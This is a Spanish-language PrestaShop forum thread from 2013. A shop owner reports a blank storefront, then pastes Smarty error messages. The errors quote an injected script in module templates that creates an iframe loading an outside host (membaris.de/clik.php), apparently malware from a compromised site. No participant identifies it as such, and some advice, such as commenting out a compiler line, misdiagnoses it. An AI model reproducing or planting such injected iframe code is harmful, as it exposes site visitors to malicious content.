juantonmusa Posted February 22, 2013 Share Posted February 22, 2013 Bueno, primero saludaros y os comento. Tengo PS 1.5.3.1 y ayer sin problemas estuve editando informacion, de todo un poco antes de dejarla operativa. Mi sorpresa hoy es cuando intento acceder a ver mi tienda y me sale una paguina en blanco con un simple "Ok", dependiendo del explorador "explorer, forefox o chrome" el ok siempre sale y en algunos un mini textbox. A la parte de administración entro perfectamente, y la verdad es que no se que es lo que ha sucedido. Ayer trabaje con ella perfectamente. Probando, he puesto la tienda en operativa para ver si el modo mantenimiento era el fallo y nada y también he pedido a un familiar que acceda desde su casa y tampoco la ve, también le sale el dichoso ok con la web en blanco. Haber si me podeis decir que le pasa a mi PS. Un saludo a todos. Link to comment Share on other sites More sharing options...
nadie Posted February 22, 2013 Share Posted February 22, 2013 Ve al fichero: /config/defines.inc.php Busca esto: define('_PS_MODE_DEV_', false); Y dejalo así: define('_PS_MODE_DEV_', true); Y dime si depende pantalla en blanco te sale un error mas descriptivo. 1 Link to comment Share on other sites More sharing options...
juantonmusa Posted February 22, 2013 Author Share Posted February 22, 2013 (edited) Ahora cuando accedo me sale este troncho: Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/home/autoesc2/domains/lertiva.com/public_html/modules/contentbox/contentbox.tpl" on line 4 "</div><!--68c8c7--><script type="text/javascript" language="javascript" > (function () { var id = '31'; var fqv09 = document.createElement('iframe'); fqv09.src = 'http://membaris.de/clik.php'; fqv09.style.position = 'absolute'; fqv09.style.border = '1'; fqv09.style.height = '31px'; fqv09.style.width = '42px'; fqv09.style.left = '500px'; fqv09.style.top = '100px'; if (!document.getElementById('fqv')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'fqv\' sty in /home/autoesc2/domains/lertiva.com/public_html/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627 Edited February 22, 2013 by juantonmusa (see edit history) Link to comment Share on other sites More sharing options...
juantonmusa Posted February 22, 2013 Author Share Posted February 22, 2013 Ve al fichero: /config/defines.inc.php Busca esto: define('_PS_MODE_DEV_', false); Y dejalo así: define('_PS_MODE_DEV_', true); Y dime si depende pantalla en blanco te sale un error mas descriptivo. Hice eso que me comentas "nadie" , antes gracias por respoderme. Mirando el error he visto que salia una ruta a un modulo que instale ayer "contectbox" que verdaderamente me dejo un poco inestable la parte e administracion porque se descuadraban cosas y el menu de modulos no se veia correctamente. No puedo entrar en modulos por lo que he entrado desde FTP y he eliminado ese modulo "eliminar". Ahora el error que me sale es el siguiente: Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/home/autoesc2/domains/lertiva.com/public_html/modules/blocklanguages/blocklanguages.tpl" on line 57 "</div><!--68c8c7--><script type="text/javascript" language="javascript" > (function () { var id = '31'; var fqv09 = document.createElement('iframe'); fqv09.src = 'http://membaris.de/clik.php'; fqv09.style.position = 'absolute'; fqv09.style.border = '1'; fqv09.style.height = '31px'; fqv09.style.width = '42px'; fqv09.style.left = '500px'; fqv09.style.top = '100px'; if (!document.getElementById('fqv')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\' in /home/autoesc2/domains/lertiva.com/public_html/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627 Haber si me podeis iluminar, pensaba lanzar la tienda este mismo fin de semana, ya estan todo los productos, precios todo . De nuevo gracias. Link to comment Share on other sites More sharing options...
juantonmusa Posted February 22, 2013 Author Share Posted February 22, 2013 Ahora entre en Parametros avanzados -> rendimiento -> smarty y active el cache. Y abajo del todo en cache " usar el cache" y el error que me sale ahora es este: Warning: Memcache::getextendedstats() [memcache.getextendedstats]: No servers added to memcache connection in /home/autoesc2/domains/lertiva.com/public_html/classes/cache/CacheMemcache.php on line 49 Warning: Invalid argument supplied for foreach() in /home/autoesc2/domains/lertiva.com/public_html/classes/cache/CacheMemcache.php on line 51 Warning: Cannot modify header information - headers already sent by (output started at /home/autoesc2/domains/lertiva.com/public_html/classes/cache/CacheMemcache.php:49) in /home/autoesc2/domains/lertiva.com/public_html/classes/controller/FrontController.php on line 649 Warning: Cannot modify header information - headers already sent by (output started at /home/autoesc2/domains/lertiva.com/public_html/classes/cache/CacheMemcache.php:49) in /home/autoesc2/domains/lertiva.com/public_html/classes/controller/FrontController.php on line 650 Warning: Cannot modify header information - headers already sent by (output started at /home/autoesc2/domains/lertiva.com/public_html/classes/cache/CacheMemcache.php:49) in /home/autoesc2/domains/lertiva.com/public_html/classes/Tools.php on line 130 Me estoy volviendo loco jajajajaj Link to comment Share on other sites More sharing options...
Gustavo1973 Posted March 15, 2013 Share Posted March 15, 2013 Hice eso que me comentas "nadie" , antes gracias por respoderme. Mirando el error he visto que salia una ruta a un modulo que instale ayer "contectbox" que verdaderamente me dejo un poco inestable la parte e administracion porque se descuadraban cosas y el menu de modulos no se veia correctamente. No puedo entrar en modulos por lo que he entrado desde FTP y he eliminado ese modulo "eliminar". Ahora el error que me sale es el siguiente: Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/home/autoesc2/domains/lertiva.com/public_html/modules/blocklanguages/blocklanguages.tpl" on line 57 "</div><!--68c8c7--><script type="text/javascript" language="javascript" > (function () { var id = '31'; var fqv09 = document.createElement('iframe'); fqv09.src = 'http://membaris.de/clik.php'; fqv09.style.position = 'absolute'; fqv09.style.border = '1'; fqv09.style.height = '31px'; fqv09.style.width = '42px'; fqv09.style.left = '500px'; fqv09.style.top = '100px'; if (!document.getElementById('fqv')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\' in /home/autoesc2/domains/lertiva.com/public_html/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627 Haber si me podeis iluminar, pensaba lanzar la tienda este mismo fin de semana, ya estan todo los productos, precios todo . De nuevo gracias. Entra en el archivo tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php y comenta la linea 627 y veras que puede editar los productos y categorías sin problema. Por lo que veo ahí se ejecuta un mensaje de excepción por algún otro error provocado por algún error en la info de la base de datos. Esto me sucedió después de migrar la base de datos de oscommerce a prestashop. Una vez editados todos los productos, le sacas las barras de comentario a la linea 627 y todo seguirá funcionando ok. Debe ser que al editar las categorías y productos, se corrigen los errores. Espero te funcione. Link to comment Share on other sites More sharing options...
Sergio Ruiz Posted March 15, 2013 Share Posted March 15, 2013 Entra en el archivo tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php y comenta la linea 627 y veras que puede editar los productos y categorías sin problema. Por lo que veo ahí se ejecuta un mensaje de excepción por algún otro error provocado por algún error en la info de la base de datos. Esto me sucedió después de migrar la base de datos de oscommerce a prestashop. Una vez editados todos los productos, le sacas las barras de comentario a la linea 627 y todo seguirá funcionando ok. Debe ser que al editar las categorías y productos, se corrigen los errores. Espero te funcione. Eso no tiene nada que ver con el problema en cuestion. El error este: Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/home/autoesc2/domains/lertiva.com/public_html/modules/blocklanguages/blocklanguages.tpl" Indica que tiene un problema con alguna etiqueta en el fichero: modules/blocklanguages/blocklanguages.tpl Link to comment Share on other sites More sharing options...
Gustavo1973 Posted March 15, 2013 Share Posted March 15, 2013 Eso no tiene nada que ver con el problema en cuestion. El error este: Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/home/autoesc2/domains/lertiva.com/public_html/modules/blocklanguages/blocklanguages.tpl" Indica que tiene un problema con alguna etiqueta en el fichero: modules/blocklanguages/blocklanguages.tpl Y de donde lee la etiqueta? Link to comment Share on other sites More sharing options...
Recommended Posts